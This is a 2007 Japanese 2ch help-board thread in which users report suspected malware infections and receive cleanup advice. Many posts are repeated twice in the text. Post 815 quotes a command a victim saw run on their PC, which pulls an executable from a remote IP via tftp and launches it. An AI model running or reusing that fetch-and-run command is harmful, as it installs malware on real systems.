【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Downloader.Obfuskated
【どんな症状が出るか】 異常は無い
【症状が出る前に何をやったか】 特に何も
【症状を解決しようとどのような処置を取ったか】 Spybotで検索他
【その他の質問】 Googleで調べても何をするウィルスか不明
Local Settings\Tempから出てきました。
トロイの一種?
通信するプログラムはJeticoで登録しないと通信できないし、
成りすましもハッシュで引っかかるはずなんだが、反応はなし。
access to networkも登録したもの以外弾いてるが、ルールに穴があるかもしれんし一応。
スタートアップはレジストリエディタから見ても怪しいのは見つかりませんでした。
Application Data以下も検出した.exeのファイル名で検索してみたが何もなし。
ttp://blog.livedoor.jp/antiny_virus/
のチェッカでも反応なし。
【MicrosoftUpdate】 自動通知
【使用セキュリティソフト】 AVG free
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Downloader.Obfuskated
【どんな症状が出るか】 異常は無い
【症状が出る前に何をやったか】 特に何も
【症状を解決しようとどのような処置を取ったか】 Spybotで検索他
【その他の質問】 Googleで調べても何をするウィルスか不明
Local Settings\Tempから出てきました。
トロイの一種?
通信するプログラムはJeticoで登録しないと通信できないし、
成りすましもハッシュで引っかかるはずなんだが、反応はなし。
access to networkも登録したもの以外弾いてるが、ルールに穴があるかもしれんし一応。
スタートアップはレジストリエディタから見ても怪しいのは見つかりませんでした。
Application Data以下も検出した.exeのファイル名で検索してみたが何もなし。
ttp://blog.livedoor.jp/antiny_virus/
のチェッカでも反応なし。
778 :名無しさん@お腹いっぱい。:2007/02/06(火) 10:06:55
すいません。
こちらで相談した結果リカバリーすることにしたのですが
部屋がゴミ箱状態でフォトショのロムが見当たりません。
今入ってるのを焼いてリカバリー後に移動しても動かないですよね? orz
あと、メール関係やお気に入りとかは保存して再利用しないほうがいいでしょうか?
また同じウイルスに感染するおそれありますか?
被害拡大しないように回線繋げてないため初心者質問でごめんなさい。
ぜひ教えてください。
こちらで相談した結果リカバリーすることにしたのですが
部屋がゴミ箱状態でフォトショのロムが見当たりません。
今入ってるのを焼いてリカバリー後に移動しても動かないですよね? orz
あと、メール関係やお気に入りとかは保存して再利用しないほうがいいでしょうか?
また同じウイルスに感染するおそれありますか?
被害拡大しないように回線繋げてないため初心者質問でごめんなさい。
ぜひ教えてください。
779 :名無しさん@お腹いっぱい。:2007/02/06(火) 12:53:43
>>778
動きません
お気に入りは問題ないとは思いますが
メールに関しては感染の可能性はありますね
どうしてもというならデータとしてでなく
ファイルとして保存しておき、最新の定義状態で
スキャン後に戻す方が良いと思います
また、感染源が確定していないなら
同様のルートから感染する恐れはあるでしょう
動きません
お気に入りは問題ないとは思いますが
メールに関しては感染の可能性はありますね
どうしてもというならデータとしてでなく
ファイルとして保存しておき、最新の定義状態で
スキャン後に戻す方が良いと思います
また、感染源が確定していないなら
同様のルートから感染する恐れはあるでしょう
780 :名無しさん@お腹いっぱい。:2007/02/06(火) 13:18:41
【使用OS】ME
【MicrosoftUpdate】特に無し
【使用セキュリティソフト】特に無し
【セキュリティソフトの定義ファイルは最新の状態であるか】特に無し
【ルータの有無】?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Trojan
【どんな症状が出るか】特に何も…
【症状が出る前に何をやったか】何か長いURLをクリックしました
【症状を解決しようとどのような処置を取ったか】
カスペルスキーオンラインチェックでウィルスのファイルが見つかったので、
一度コミ箱へ移し、中身を空にしました。
その後、もう一度カスペルスキーオンラインチェックで検査しましたが、ウィルスは
無くなっていませんでした。
ttp://thumb2.uploda.org/file/uporg682671.jpg
【その他の質問】
ゴミ箱へ入れたのが間違いだったのでしょうか。
C:¥_RESTOREというものも見つかりません。
どなたか宜しくお願いします。
【MicrosoftUpdate】特に無し
【使用セキュリティソフト】特に無し
【セキュリティソフトの定義ファイルは最新の状態であるか】特に無し
【ルータの有無】?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Trojan
【どんな症状が出るか】特に何も…
【症状が出る前に何をやったか】何か長いURLをクリックしました
【症状を解決しようとどのような処置を取ったか】
カスペルスキーオンラインチェックでウィルスのファイルが見つかったので、
一度コミ箱へ移し、中身を空にしました。
その後、もう一度カスペルスキーオンラインチェックで検査しましたが、ウィルスは
無くなっていませんでした。
ttp://thumb2.uploda.org/file/uporg682671.jpg
【その他の質問】
ゴミ箱へ入れたのが間違いだったのでしょうか。
C:¥_RESTOREというものも見つかりません。
どなたか宜しくお願いします。
781 :名無しさん@お腹いっぱい。:2007/02/06(火) 13:32:05
【使用OS】windows XP
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】ウイルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】踏んだ時は最新、今はわからない
【ルータの有無】有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】・ウイルスバスターが書き換えられたのかスキャンと駆除が不可、最新版に更新が変。しきりに再起動させようとさせる
・タスクマネージャーのユーザーにLOCAL SERVICEとNETWORK SEVICEが追加されている。
【症状が出る前に何をやったか】ニュー速VIPのhttp://ex17.2ch.net/test/read.cgi/news4vip/1170684618/の>>1のウイルス?か何かを踏んだ
【症状を解決しようとどのような処置を取ったか】ウイルスバスターのスキャン→壊れていたのでオンラインスキャンをしたが検出されず
【その他の質問】
・ウイルスバスターの再インスコはまだしてない。
少ない情報ですが、解決策等ありましたら教えてください。
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】ウイルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】踏んだ時は最新、今はわからない
【ルータの有無】有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】・ウイルスバスターが書き換えられたのかスキャンと駆除が不可、最新版に更新が変。しきりに再起動させようとさせる
・タスクマネージャーのユーザーにLOCAL SERVICEとNETWORK SEVICEが追加されている。
【症状が出る前に何をやったか】ニュー速VIPのhttp://ex17.2ch.net/test/read.cgi/news4vip/1170684618/の>>1のウイルス?か何かを踏んだ
【症状を解決しようとどのような処置を取ったか】ウイルスバスターのスキャン→壊れていたのでオンラインスキャンをしたが検出されず
【その他の質問】
・ウイルスバスターの再インスコはまだしてない。
少ない情報ですが、解決策等ありましたら教えてください。
>>779
ありがとうございました。
メールは大事なものだけをファイルでとっておきます。
ロムは古いバージョンのものはあるので当面はそれを使い、
これを機に部屋とパソコンの中身を整理しようと思います。
ありがとうございました。
メールは大事なものだけをファイルでとっておきます。
ロムは古いバージョンのものはあるので当面はそれを使い、
これを機に部屋とパソコンの中身を整理しようと思います。
783 :名無しさん@お腹いっぱい。:2007/02/06(火) 15:14:54
>>777
CastleCopsで、「Obfuskated」でサイト内検索かけたら。。。スペル訂正されて、「Obfuscated」で2件情報あったよ
Obfuscated Javascript malware
ttp://www.castlecops.com/postlite173537-obfuscated.html
Obfuscated links etc
ttp://www.castlecops.com/postlite164515-obfuscated.html
CastleCopsで、「Obfuskated」でサイト内検索かけたら。。。スペル訂正されて、「Obfuscated」で2件情報あったよ
Obfuscated Javascript malware
ttp://www.castlecops.com/postlite173537-obfuscated.html
Obfuscated links etc
ttp://www.castlecops.com/postlite164515-obfuscated.html
784 :名無しさん@お腹いっぱい。:2007/02/06(火) 19:59:28
【使用OS】windows XP
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】Antivir
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】OCT?だかTCX??だかのファイルが見つかりませんだとか実行できませんだとか
出た後、ガリガリ言い出したから慌ててエクスプローラを強制終了した
【症状が出る前に何をやったか】wmv .exeファイルをふんだ
【症状を解決しようとどのような処置を取ったか】Antivirのスキャン中
【その他の質問】
ウィルス名と対処法をお願いします。
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】Antivir
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】OCT?だかTCX??だかのファイルが見つかりませんだとか実行できませんだとか
出た後、ガリガリ言い出したから慌ててエクスプローラを強制終了した
【症状が出る前に何をやったか】wmv .exeファイルをふんだ
【症状を解決しようとどのような処置を取ったか】Antivirのスキャン中
【その他の質問】
ウィルス名と対処法をお願いします。
785 : ◆N9P3SuvBPo :2007/02/06(火) 20:11:13
>784
>【症状が出る前に何をやったか】wmv .exeファイルをふんだ
その前にそのファイルをどこから落としたか正直に言おうよw
>【症状が出る前に何をやったか】wmv .exeファイルをふんだ
その前にそのファイルをどこから落としたか正直に言おうよw
786 :名無しさん@お腹いっぱい。:2007/02/06(火) 20:15:08
>>783
AVGではObfuskatedになってる…
そこのフォーラムではどっかのサイトに飛ばしてくるという話っぽいが
ttp://www.emsisoft.jp/jp/malware/?Trojan-Downloader.Win32.Obfuscated.bh
だとトロイダウンロードツールになってる…
英語自信ないんで読み間違っているかもしれんけど。
ともかく削除したし、警告も何度も出ないし、
通信してもいないし、症状も無いので大丈夫かな。
ありがとうございます。
AVGではObfuskatedになってる…
そこのフォーラムではどっかのサイトに飛ばしてくるという話っぽいが
ttp://www.emsisoft.jp/jp/malware/?Trojan-Downloader.Win32.Obfuscated.bh
だとトロイダウンロードツールになってる…
英語自信ないんで読み間違っているかもしれんけど。
ともかく削除したし、警告も何度も出ないし、
通信してもいないし、症状も無いので大丈夫かな。
ありがとうございます。
787 :名無しさん@お腹いっぱい。:2007/02/06(火) 22:10:50
>>635
更に10日間ぐらいの内に6連続でNOD32が検出できないウイルス出現。
今回はフリー製品、御三家(バスター、ノートン、マカフィー)、
その他の製品も多数検出できているのに、NOD32は駄目。
代表的な検出名:Trojan.Dorroper.Joiner
http://vista.crap.jp/img/vi7072259495.jpg
http://www.virustotal.com/
更に10日間ぐらいの内に6連続でNOD32が検出できないウイルス出現。
今回はフリー製品、御三家(バスター、ノートン、マカフィー)、
その他の製品も多数検出できているのに、NOD32は駄目。
代表的な検出名:Trojan.Dorroper.Joiner
http://vista.crap.jp/img/vi7072259495.jpg
http://www.virustotal.com/
788 :通りすがり:2007/02/06(火) 22:20:48
Fセキュアは、ホームページ見る限りでは良さそうですが、使ったことある人いますか?
789 :名無しさん@お腹いっぱい。:2007/02/06(火) 23:19:17
【風呂きのこ】 clione77 = ネ申 【スーパーハカー】
重要スレ
【爆笑ヤフオク】笑えるシュピン80【腹痛てぇ】
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/
まだ返答の無い質問に激ワラ発言
【リラックス?】僕があなたにモーニングコール!!【1週間分】
ttp://page4.auctions.yahoo.co.jp/jp/show/qanda?aID=d69659688
<神の発言>
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/514-
<謝りゃいいのにハカー気取りでアフォ三昧>
523 名前:514[sage] 投稿日:2007/02/04(日) 12:07:11 ID:ANQbYgm40
アレッ?
皆、出品者が回答しなくても見れる方法知らないの?
コレ出品しようかなw
yahoo japanを巻き込んでの春節祭の予感にワクテカするスレです。
それでヤフオクはこの対応w
http://auctions.yahoo.co.jp/phtml/auc/jp/notice/20070206.html
重要スレ
【爆笑ヤフオク】笑えるシュピン80【腹痛てぇ】
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/
まだ返答の無い質問に激ワラ発言
【リラックス?】僕があなたにモーニングコール!!【1週間分】
ttp://page4.auctions.yahoo.co.jp/jp/show/qanda?aID=d69659688
<神の発言>
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/514-
<謝りゃいいのにハカー気取りでアフォ三昧>
523 名前:514[sage] 投稿日:2007/02/04(日) 12:07:11 ID:ANQbYgm40
アレッ?
皆、出品者が回答しなくても見れる方法知らないの?
コレ出品しようかなw
yahoo japanを巻き込んでの春節祭の予感にワクテカするスレです。
それでヤフオクはこの対応w
http://auctions.yahoo.co.jp/phtml/auc/jp/notice/20070206.html
790 :宜しくお願いします:2007/02/06(火) 23:40:54
質問させてください。
当会社のIPアドレスがこちらで瑠璃色という人物に不正に利用されています
http://qb5.2ch.net/test/read.cgi/saku/1069381667/
管理会社に問い合わせたところ、とりあえずアンチスパイソフトを
いれてくださいといわれましたが、もう入っています。
なぜ、こういうことがおこるのかさっぱりわかりません。
初心者でもわかるように誰か説明していただければ幸いです。
会社にはパソコンに詳しい者がおりませんので困っています。
初心者のところで聞きましたらば、バックドアというものが
関係しているらしいです。
当会社のIPアドレスがこちらで瑠璃色という人物に不正に利用されています
http://qb5.2ch.net/test/read.cgi/saku/1069381667/
管理会社に問い合わせたところ、とりあえずアンチスパイソフトを
いれてくださいといわれましたが、もう入っています。
なぜ、こういうことがおこるのかさっぱりわかりません。
初心者でもわかるように誰か説明していただければ幸いです。
会社にはパソコンに詳しい者がおりませんので困っています。
初心者のところで聞きましたらば、バックドアというものが
関係しているらしいです。
791 :宜しくお願いします:2007/02/07(水) 00:09:11
もうひとつ、管理の会社の人がおっしゃってたのですが
不正アクセスや迷惑メールのための踏み台に利用されている恐れが
ありますということでした。会社の信用がなくなるということです。
不正アクセスや迷惑メールのための踏み台に利用されている恐れが
ありますということでした。会社の信用がなくなるということです。
792 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:14:08
>>790-791
(;^ω^)
(;^ω^)
793 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:18:59
管理者がいないのか・・・・・
794 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:21:03
ウィルス板じゃなくてセキュリティ板だろうに
気の毒なことだ 向こうで答えたのも
華麗にスルーしてるし もうネットに繋ぐの
止めたらいいよ
気の毒なことだ 向こうで答えたのも
華麗にスルーしてるし もうネットに繋ぐの
止めたらいいよ
795 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:39:36
規制議論に居た当会社君か
金払ってその手の仕事の所にやって貰えよ
金払ってその手の仕事の所にやって貰えよ
796 :名無しさん@お腹いっぱい。:2007/02/07(水) 01:54:47
ウイルスの入ったファイルをけしたいのですが使用中で消せません。どうすれば消せるんですか?
797 :名無しさん@お腹いっぱい。:2007/02/07(水) 06:13:43
798 :名無しさん@お腹いっぱい。:2007/02/07(水) 07:14:33
>>796
つSafeMode
つSafeMode
799 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:01:20
ウイルスにやられたっぽい。
右下のアイコンの所に、×印がでてそこから「YOUR COMPUTER IS IN DANGER」 やら 「クリック HERE そしたらあなたのコンピューター守るツールあるよ」的なメッセージがでます。どうしたらいいの?
右下のアイコンの所に、×印がでてそこから「YOUR COMPUTER IS IN DANGER」 やら 「クリック HERE そしたらあなたのコンピューター守るツールあるよ」的なメッセージがでます。どうしたらいいの?
800 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:33:08
削除すればいいんじゃない?
801 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:38:56
削除?右クリックで?
冷静に状況を把握するとインターネットに繋がらなくなったくらいしか被害がない。今の所。ただ×印は消えない
冷静に状況を把握するとインターネットに繋がらなくなったくらいしか被害がない。今の所。ただ×印は消えない
802 :名無しさん@お腹いっぱい。:2007/02/07(水) 13:58:06
【使用OS】 win2000
【MicrosoftUpdate】 済
【使用セキュリティソフト】 ノートン2005
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】bloodhound.exploit.45
【どんな症状が出るか】 動作が重い
【症状が出る前に何をやったか】 使用者がPC初心者のため、重い状態で長期間放置
【症状を解決しようとどのような処置を取ったか】 ノートンでBloodhoundを検疫。Ad-awareを実行も何も無し。
【その他の質問】
ノートンでBloodhoundは削除に成功した様子。(スキャンしてももう出ない。)
ただし、異常に重い状態なのは解消されず。
タスクマネージャーのアプリケーションのところに、実行中状態で
「Quick Launch」というのがあって、再起動するたびに現れる。
たぶん「Quick Launch」ってのが悪いと思うんですが、
どうすればでなくなるでしょうか?
違うとすれば他にどんな原因が。
ご教示願いします。
【MicrosoftUpdate】 済
【使用セキュリティソフト】 ノートン2005
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】bloodhound.exploit.45
【どんな症状が出るか】 動作が重い
【症状が出る前に何をやったか】 使用者がPC初心者のため、重い状態で長期間放置
【症状を解決しようとどのような処置を取ったか】 ノートンでBloodhoundを検疫。Ad-awareを実行も何も無し。
【その他の質問】
ノートンでBloodhoundは削除に成功した様子。(スキャンしてももう出ない。)
ただし、異常に重い状態なのは解消されず。
タスクマネージャーのアプリケーションのところに、実行中状態で
「Quick Launch」というのがあって、再起動するたびに現れる。
たぶん「Quick Launch」ってのが悪いと思うんですが、
どうすればでなくなるでしょうか?
違うとすれば他にどんな原因が。
ご教示願いします。
803 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:05:42
804 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:09:41
>>802
Norton2005-2006製品といえば常駐が一番重かった頃です
CPUとメモリ搭載量はどれくらいですか?
パソコンを起動した時の普段のプロセスの数はいくつですか?
たまには、最新エンジンの「シマンテック・セキュリティチェック」もしてみて下さい
Norton2005-2006製品といえば常駐が一番重かった頃です
CPUとメモリ搭載量はどれくらいですか?
パソコンを起動した時の普段のプロセスの数はいくつですか?
たまには、最新エンジンの「シマンテック・セキュリティチェック」もしてみて下さい
805 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:10:32
>>803
回答ありがとうございます。
そのスパイウェアには突き当たったのですが、
「Spyware.QuickLaunch」
はノートンで検出されません。
念のため、そのページで指定されているレジストリもチェックしましたが、
該当するような部分は存在しませんでした。
回答ありがとうございます。
そのスパイウェアには突き当たったのですが、
「Spyware.QuickLaunch」
はノートンで検出されません。
念のため、そのページで指定されているレジストリもチェックしましたが、
該当するような部分は存在しませんでした。
Nortonがスパイウェアに対応したのは2006製品からです
807 :802:2007/02/07(水) 15:30:32
808 :名無しさん@お腹いっぱい。:2007/02/07(水) 19:47:00
809 :名無しさん@お腹いっぱい。:2007/02/07(水) 20:04:04
タスクマネージャにconime.exeが2つもあるのですが、どちらが不適切なプロセスなのでしょうか。
ひとつは64KB、約3000KB使うもうひとつはようです。どちらも小文字です。
対処の仕方も併せてお願いします。
使用しているOSはXP(HOME)SP2です。
ひとつは64KB、約3000KB使うもうひとつはようです。どちらも小文字です。
対処の仕方も併せてお願いします。
使用しているOSはXP(HOME)SP2です。
タスクマネージャにconime.exeが2つもあるのですが、どちらが不適切なプロセスなのでしょうか。
ひとつは64KB、もうひとつは約3000KB使うようです。どちらも小文字です。
対処の仕方も併せてお願いします。
使用しているOSはXP(HOME)SP2です。
ひとつは64KB、もうひとつは約3000KB使うようです。どちらも小文字です。
対処の仕方も併せてお願いします。
使用しているOSはXP(HOME)SP2です。
811 :名無しさん@お腹いっぱい。:2007/02/08(木) 00:06:53
実行中の.exe感染型ならどっちもout
対処法→リカバリ
なお 通常XPHOMESP2のconime.exeのパスはc:\windows\system32\
対処法→リカバリ
なお 通常XPHOMESP2のconime.exeのパスはc:\windows\system32\
812 :名無しさん@お腹いっぱい。:2007/02/08(木) 06:41:34
conime.exe Microsoft コンソールIME。日本語入力のサポート。
64KBの方が怪しいだろ・・・常識的に考えて・・・
64KBの方が怪しいだろ・・・常識的に考えて・・・
813 :名無しさん@お腹いっぱい。:2007/02/08(木) 08:59:34
知人からメールを受け取り、そのメールに添付されている写真(JPEG)を開いた際、
その写真は通常の写真で「Adobe Photoshop Albu, Mini 3.0」で1枚のみ表示されます。
通常、そこで印刷ボタンを押してその写真を印刷しようとした場合、その写真が印刷できると思うのですが、
印刷ボタンを押すと印刷プレビューが現れ、それまでそのPCでネット閲覧してきたWINDOWSの一時ファイルに
入っているものと思われるものが印刷プレビューに数10枚出てきました。
IEを立ち上げ、ツール→一時ファイルの削除 を実行してもう一度その写真を開くと、
数10枚の写真は出てこず、添付ファイルについているもののみ表示されました。
これは何かのウィルスでしょうか。ご指南お願いします。
(写真を取り込むにした場合と印刷ボタンを押したのと同じ画面になります)
機種:XP(デル)
ブラウザ:IE6.0
その写真は通常の写真で「Adobe Photoshop Albu, Mini 3.0」で1枚のみ表示されます。
通常、そこで印刷ボタンを押してその写真を印刷しようとした場合、その写真が印刷できると思うのですが、
印刷ボタンを押すと印刷プレビューが現れ、それまでそのPCでネット閲覧してきたWINDOWSの一時ファイルに
入っているものと思われるものが印刷プレビューに数10枚出てきました。
IEを立ち上げ、ツール→一時ファイルの削除 を実行してもう一度その写真を開くと、
数10枚の写真は出てこず、添付ファイルについているもののみ表示されました。
これは何かのウィルスでしょうか。ご指南お願いします。
(写真を取り込むにした場合と印刷ボタンを押したのと同じ画面になります)
機種:XP(デル)
ブラウザ:IE6.0
814 :名無しさん@お腹いっぱい。:2007/02/08(木) 10:15:22
【使用OS】 XP
【MicrosoftUpdate】 最近してなかった
【使用セキュリティソフト】 AVAST
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 ない
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan.Win32:Agent-EEW
Win32:Agent-BSU
【どんな症状が出るか】 ネット中たまに不安定になる、AVASTが反応する
起動時にインターネットの共同構成(?)が勝手にでてくる
システムの復元も未完了って出て出来ない
【症状が出る前に何をやったか】 エロサイト閲覧中にAntiVermeansっていうポップアップ系のマルに
感染してActiveXなんたらもインストールされた
【症状を解決しようとどのような処置を取ったか】 SmitfraudFix使ったらディスククリーンアップ中にかってに
強制終了してしまい、ディスククリーンアップをキャンセルしてやってみたら
AntiVermeansとActiveXはアンインストールできたっぽい
【MicrosoftUpdate】 最近してなかった
【使用セキュリティソフト】 AVAST
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 ない
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan.Win32:Agent-EEW
Win32:Agent-BSU
【どんな症状が出るか】 ネット中たまに不安定になる、AVASTが反応する
起動時にインターネットの共同構成(?)が勝手にでてくる
システムの復元も未完了って出て出来ない
【症状が出る前に何をやったか】 エロサイト閲覧中にAntiVermeansっていうポップアップ系のマルに
感染してActiveXなんたらもインストールされた
【症状を解決しようとどのような処置を取ったか】 SmitfraudFix使ったらディスククリーンアップ中にかってに
強制終了してしまい、ディスククリーンアップをキャンセルしてやってみたら
AntiVermeansとActiveXはアンインストールできたっぽい
815 :名無しさん@お腹いっぱい。:2007/02/08(木) 13:59:01
突然、ファイル名を指定して実行が立ち上がり、以下のようなものが実行されました。
%comspec% /c tftp -i 24.205.47.33 GET ammvo.exe & start ammvo
AVGで全チェックしたらammvo.exeが検出され無事削除しました。
ところがしばらくすると再度コマンドが実行されました。今度はammvo.exeではなくbftvy.exeでした。
ルーターのログをチェックしたところ135と445にアタックがかなりきています。
これらのポートはルーターではじいていますがちょっと不安です。
何か情報をお持ちの方がいらっしゃればご教授願います。
%comspec% /c tftp -i 24.205.47.33 GET ammvo.exe & start ammvo
AVGで全チェックしたらammvo.exeが検出され無事削除しました。
ところがしばらくすると再度コマンドが実行されました。今度はammvo.exeではなくbftvy.exeでした。
ルーターのログをチェックしたところ135と445にアタックがかなりきています。
これらのポートはルーターではじいていますがちょっと不安です。
何か情報をお持ちの方がいらっしゃればご教授願います。
816 :名無しさん@お腹いっぱい。:2007/02/08(木) 15:51:13
>>635>>787
こんなやり取りを目撃した。NOD32・・・・・・。∀;)
セキュリティ初心者質問スレッドpart81
631 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:45:19
「Vistaを守れなかったアンチウイルスソフト」:Virus Bulletin調査
ttp://japan.cnet.com/news/sec/story/0,2000056024,20342509,00.htm
>合格した11製品は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantec
>から発売されているアンチウイルスソフトウェアで、すべてのウイルスを検出した。
NOD32は駄目だったのね(´;ω;)
632 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:52:00
>>631
NOD32は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantecみたいに、
全てのウイルスは検出できなかったんでしょうな。
633 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:57:21
>>631
以前のNODはよかったけど最近は普通のレベルにまで落ちてしまった
こんなやり取りを目撃した。NOD32・・・・・・。∀;)
セキュリティ初心者質問スレッドpart81
631 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:45:19
「Vistaを守れなかったアンチウイルスソフト」:Virus Bulletin調査
ttp://japan.cnet.com/news/sec/story/0,2000056024,20342509,00.htm
>合格した11製品は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantec
>から発売されているアンチウイルスソフトウェアで、すべてのウイルスを検出した。
NOD32は駄目だったのね(´;ω;)
632 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:52:00
>>631
NOD32は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantecみたいに、
全てのウイルスは検出できなかったんでしょうな。
633 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:57:21
>>631
以前のNODはよかったけど最近は普通のレベルにまで落ちてしまった
今見たら64kのがない。
バックアップ取ってない(哀)。
バックアップ取ってない(哀)。
プロセスの親玉表示するソフトって何がありましたっけ?
こういうの初めてだからカテゴリーすら分からないです。
こういうの初めてだからカテゴリーすら分からないです。
819 :名無しさん@お腹いっぱい。:2007/02/08(木) 17:42:42
呼び出しても、ドス関連は勉強不足で「何がなんだか」状態です。
821 : ◆N9P3SuvBPo :2007/02/08(木) 18:25:09
>820=>809
conime.exeが2つあった。
ひとつは64KB、もうひとつは約3000KB
PC内をconime.exeを検索
64KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果
約3000KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果
↓VirusTotalのサイト
ttp://virustotal.com/
conime.exeが2つあった。
ひとつは64KB、もうひとつは約3000KB
PC内をconime.exeを検索
64KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果
約3000KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果
↓VirusTotalのサイト
ttp://virustotal.com/
822 :名無しさん@お腹いっぱい。:2007/02/08(木) 18:39:53
やってみます。ひとまずありがとうございます。
824 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:04:12
テンプレ
【使用OS】 XP
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 AVG
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 hotmailへメールが送られてこなくたった。
【症状が出る前に何をやったか】 Skype paltalk
【症状を解決しようとどのような処置を取ったか】 上記ソフトの削除
【その他の質問】
Perflib_Perfdata_35c.dat
っていうファイルがTEMPにあって気になるのですが
削除できません。
何をしているファイルなんでしょうか。
【使用OS】 XP
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 AVG
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 hotmailへメールが送られてこなくたった。
【症状が出る前に何をやったか】 Skype paltalk
【症状を解決しようとどのような処置を取ったか】 上記ソフトの削除
【その他の質問】
Perflib_Perfdata_35c.dat
っていうファイルがTEMPにあって気になるのですが
削除できません。
何をしているファイルなんでしょうか。
825 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:12:03
826 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:23:42
>>825
ありがとうございます。使ってません。
VMware、存在は聞いたことはありましたがあまりよくわからなかったのでググりました。
便乗させてもらうのですがIEやfirefoxやネスケを使っていると
決まったサイトで画面が消えてしまうことがあります。
firefoxではダウンロードがうまくできません。
関係あるでしょうか。
ありがとうございます。使ってません。
VMware、存在は聞いたことはありましたがあまりよくわからなかったのでググりました。
便乗させてもらうのですがIEやfirefoxやネスケを使っていると
決まったサイトで画面が消えてしまうことがあります。
firefoxではダウンロードがうまくできません。
関係あるでしょうか。
827 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:31:34
>>825
度々すみません。
Microsoft VM 診断ツールを使ったところ
# VM ランタイム: あり
# Microsoft VM への依存関係: あり
# Java バイナリ: なし
# MS Java バイナリ: あり
こうでました。
VMの意味を取り違えているでしょうか。
度々すみません。
Microsoft VM 診断ツールを使ったところ
# VM ランタイム: あり
# Microsoft VM への依存関係: あり
# Java バイナリ: なし
# MS Java バイナリ: あり
こうでました。
VMの意味を取り違えているでしょうか。
828 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:32:38
トロイを検索して駆除するときってセーフモードでシステムの復元無効でやったほうがいいの?
829 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:35:43
>>826
Perflib_Perfdata_はなんらかのサービスが作成しているらしい マルウェアではないっぽい
Skypeをしばらく止めてみて作成されなくなったらそれが原因じゃないの?
http://www.kotaete-net.net/Default.aspx?pgid=14&qid=40134527421
あと.batを使って起動時に自動消去できるってさ
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413
てかまずググろうぜw
Perflib_Perfdata_はなんらかのサービスが作成しているらしい マルウェアではないっぽい
Skypeをしばらく止めてみて作成されなくなったらそれが原因じゃないの?
http://www.kotaete-net.net/Default.aspx?pgid=14&qid=40134527421
あと.batを使って起動時に自動消去できるってさ
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413
てかまずググろうぜw
>>827
いや vmwareの意味で言った
いや vmwareの意味で言った
831 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:48:20
>>830>>829
ありがとうございます。
ファイル名のままググってました。
